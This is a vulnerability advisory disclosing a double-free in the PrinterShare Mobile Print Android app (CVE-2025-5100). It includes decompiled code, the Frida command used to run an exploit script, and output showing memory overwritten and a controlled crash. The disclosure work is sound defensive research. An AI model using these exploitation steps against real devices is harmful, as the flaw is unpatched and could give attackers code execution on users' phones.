Skip to main content
Security Advisory

Mobile Dynamix PrinterShare Mobile Print Double-Free Memory Write

Advisory ID
KL-001-2025-005
CVE ID
CVE-2025-5100
Published
2025-05-22
Vendor
Mobile Dynamix

Affected Systems

Product
PrinterShare Mobile Print
Version
up to 12.15.01
Platform
Android

Discovered By

Felix Segoviano (KoreLogic)
Download (signed .txt)
Back to Advisories

Vulnerability Details

Affected Vendor: Mobile Dynamix
Affected Product: PrinterShare Mobile Print
Affected Version: up to 12.15.01
Platform: Android
CWE Classification: CWE-415: Double Free, CWE-416: Use After Free
CVE ID: CVE-2025-5100

Vulnerability Description

A double-free condition occurs during the cleanup of temporary image files, which can be exploited to achieve memory corruption and potentially arbitrary code execution.

Technical Description

The vulnerability is in the bitmap handling in ActivityPrintPictures. The v1() method loads bitmaps from files or content URIs. The method then calls x1() after attempting to decode a bitmap. In the exception handler for OutOfMemoryError, it recycles the bitmap.

The x1() method (visible in the Frida hooks) creates a 512x512 bitmap and immediately recycles it. An OutOfMemoryError happens during bitmap loading in v1(); the bitmap is recycled in the error handler.

  public Bitmap v1(l lVar) {
      Bitmap bitmap = null;
      boolean z2 = false;
      for (int i3 = 0; i3 < 3; i3++) {
          try {
              B.e();
              BitmapFactory.Options options = new BitmapFactory.Options();
              options.inPreferredConfig = Bitmap.Config.ARGB_8888;
              options.inDither = false;
              if (i3 > 0) {
                  options.inSampleSize = 1 << i3;
              }
              InputStream fileInputStream = lVar.f5200c != null ? new FileInputStream(lVar.f5200c) : getContentResolver().openInputStream(lVar.f5198a);
              if (fileInputStream != null) {
                  bitmap = BitmapFactory.decodeStream(fileInputStream, null, options);
                  fileInputStream.close();
              }
              x1();
              break;
          } catch (IOException e3) {
              e3.printStackTrace();
              B.A(e3);
          } catch (OutOfMemoryError unused) {
              if (bitmap != null) {
                  bitmap.recycle();
                  bitmap = null;
              }
              if (!z2 && i3 > 0) {
                  B.a();
                  z2 = true;
              }
          }
      }
      return bitmap;
  }

Then x1() is called which creates and recycles another bitmap.

  private void x1() {
      Bitmap createBitmap = Bitmap.createBitmap(512, 512, Bitmap.Config.ARGB_8888);
      if (createBitmap != null) {
          createBitmap.recycle();
      }
  }

The Android memory allocator may reuse the same memory block, which results in the same address being freed twice (double-free).

Demonstrating the leaking of memory by running the frida script. This first intercepts freed memory chunks, then writes to that memory and monitors the cache.

    $ frida -U -f com.dynamixsoftware.printershare -l exploit.js
         ____
        / _  |   Frida 16.6.5 - A world-class dynamic instrumentation toolkit
       | (_| |
        > _  |   Commands:
       /_/ |_|       help      -> Displays the help system
       . . . .       object?   -> Display information about 'object'
       . . . .       exit/quit -> Exit
       . . . .
       . . . .   More info at https://frida.re/docs/home/
       . . . .
       . . . .   Connected to SM T220 (id=R83X10JATAV)
    Spawning `com.dynamixsoftware.printershare`...
    [+] Found 'free' function at 0x78b4adbf30 in module: libc.so
    [+] Double-free exploitation script initialized
    [+] Targeting the v1()->x1() bitmap handling vulnerability
    [+] Waiting for free() calls to intercept...
    Spawned `com.dynamixsoftware.printershare`. Resuming main thread!
    [SM T220::com.dynamixsoftware.printershare ]->
    ...SNIP...
    === Memory at 0xb400007820205700 AFTER overwrite ===
               0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    00000000  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000020  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000030  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000040  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000050  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000060  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000070  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    [+] Immediate exploitation succeeded for 0xb400007820205700

    === Memory at 0xb4000078202ad320 BEFORE overwrite ===
               0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    00000000  64 61 6c 76 69 6b 2f 73 79 73 74 65 6d 2f 56 4d  dalvik/system/VM
    00000010  52 75 6e 74 69 6d 65 00 65 61 64 3b 00 00 00 00  Runtime.ead;....
    00000020  10 71 a1 1d 78 00 00 00 ff ff ff ff ff ff ff ff  .q..x...........
    00000030  00 00 00 00 00 00 00 00 20 d3 2a 20 78 00 00 b4  ........ .* x...
    00000040  01 00 00 00 02 00 00 00 08 8a 31 20 78 00 00 b4  ..........1 x...
    00000050  00 00 00 00 00 00 00 00 60 d2 2a 20 78 00 00 b4  ........`.* x...
    00000060  41 84 07 1d 78 00 00 00 00 66 2f 20 78 00 00 b4  A...x....f/ x...
    00000070  00 00 00 00 00 00 00 00 98 d2 2a 20 78 00 00 b4  ..........* x...
    [+] Successfully wrote 500 bytes to 0xb4000078202ad320

    === Memory at 0xb4000078202ad320 AFTER overwrite ===
               0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    00000000  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000020  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000030  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000040  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000050  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000060  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000070  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    [+] Immediate exploitation succeeded for 0xb4000078202ad320

    === Memory at 0xb4000078202ad300 BEFORE overwrite ===
               0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    00000000  4c 64 61 6c 76 69 6b 2f 73 79 73 74 65 6d 2f 56  Ldalvik/system/V
    00000010  4d 52 75 6e 74 69 6d 65 3b 00 00 00 1e 00 00 00  MRuntime;.......
    00000020  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000030  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000040  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000050  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000060  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000070  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    [+] Successfully wrote 500 bytes to 0xb4000078202ad300

    === Memory at 0xb4000078202ad300 AFTER overwrite ===
               0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    00000000  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000020  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000030  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000040  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000050  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000060  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000070  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    [+] Immediate exploitation succeeded for 0xb4000078202ad300

    === Memory at 0xb4000078202ad2e0 BEFORE overwrite ===
               0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    00000000  64 61 6c 76 69 6b 2e 73 79 73 74 65 6d 2e 56 4d  dalvik.system.VM
    00000010  52 75 6e 74 69 6d 65 00 61 64 00 20 78 00 00 b4  Runtime.ad. x...
    00000020  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000030  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000040  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000050  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000060  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000070  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    [+] Successfully wrote 500 bytes to 0xb4000078202ad2e0

    === Memory at 0xb4000078202ad2e0 AFTER overwrite ===
               0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
    00000000  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000010  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000020  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000030  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000040  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000050  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000060  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    00000070  30 bf ad b4 30 bf ad b4 30 bf ad b4 30 bf ad b4  0...0...0...0...
    [+] Immediate exploitation succeeded for 0xb4000078202ad2e0
    Process crashed: Bad access due to invalid address

    ***
    *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
    Build fingerprint: 'samsung/gta7litewifixx/gta7litewifi:13/TP1A.220624.014/T220XXS6CWL2:user/release-keys'
    Revision: '0'
    ABI: 'arm64'
    Processor: '0'
    Timestamp: 2025-03-02 10:54:25.642520460-0800
    Process uptime: 3s
    Cmdline: com.samsung.android.scs
    pid: 32625, tid: 32625, name: ung.android.scs  >>> com.samsung.android.scs <<<
    uid: 10243
    signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0041414141414140
        x0  0000000000000001  x1  4141414141414141  x2  0000000072a27ffc  x3  0000000000000001
        x4  0000007feb0e8530  x5  000000781d065ee0  x6  000000000000001a  x7  0000000000000018
        x8  0000007feb0e87c0  x9  4141414141414140  x10 0000007feb0e8150  x11 0000000000000006
        x12 0000000000000069  x13 000000781dc0e180  x14 000000781dc0c598  x15 0000000000000000
        x16 0000000020000001  x17 0000000000000000  x18 00000078ccb6a000  x19 b400007820205650
        x20 b400007820205660  x21 0000000072e625d0  x22 4141414141414141  x23 000000781d776d80
        x24 b4000078202cd400  x25 00000078cc4c1000  x26 000000781dc0d000  x27 0000007feb0e8960
        x28 b400007820244800  x29 0000007feb0e8900
        lr  000000781d2cc408  sp  0000007feb0e86d0  pc  000000781d2cc190  pst 0000000080000000
    backtrace:
          #00 pc 00000000002cc190  /apex/com.android.art/lib64/libart.so (artQuickResolutionTrampoline+2764) (BuildId: 629e0ffca501d809c29dbbeef2f512d3)
          #01 pc 000000000037ee08  /apex/com.android.art/lib64/libart.so (art_quick_resolution_trampoline+88) (BuildId: 629e0ffca501d809c29dbbeef2f512d3)
          #02 pc 0000000000780108  /apex/com.android.art/lib64/libart.so (nterp_helper+152) (BuildId: 629e0ffca501d809c29dbbeef2f512d3)
          #03 pc 000000000003fb3a  /apex/com.android.conscrypt/javalib/conscrypt.jar (com.android.org.conscrypt.TrustedCertificateStore.setDefaultUserDirectory+14)
          #04 pc 0000000000b716dc  /data/misc/apexdata/com.android.art/dalvik-cache/arm64/boot.oat (android.app.ActivityThread.main+764)
    ***
    [SM T220::com.dynamixsoftware.printershare ]->

Mitigation and Remediation Recommendation

No response from vendor. There are no known mitigations to end-users of the affected application versions.

Credit

This vulnerability was discovered by Felix Segoviano of KoreLogic, Inc.

Proof of Concept

URL: https://www.korelogic.com/advisories/KL-001-2025-005.poc.js.txt

SHA256sum: 596c119c3b1ef6749d59ff5def5b2e88bca04dde15e86683d074d259458519da

The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

Disclosure Timeline

KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com.

KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com.

KoreLogic submits vulnerability details to vendor via {info,support}@mobiledynamix.com.

KoreLogic public disclosure.

Back to Advisories

Responsible Disclosure

KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.

Vendor notification and coordination
90+ day disclosure timeline
CVE coordination when applicable

Resources & Downloads

Proof of Concept Files

JAVASCRIPT PoC SHA256: 596c119c...
Contact Security Team
All Advisories Download signed .txt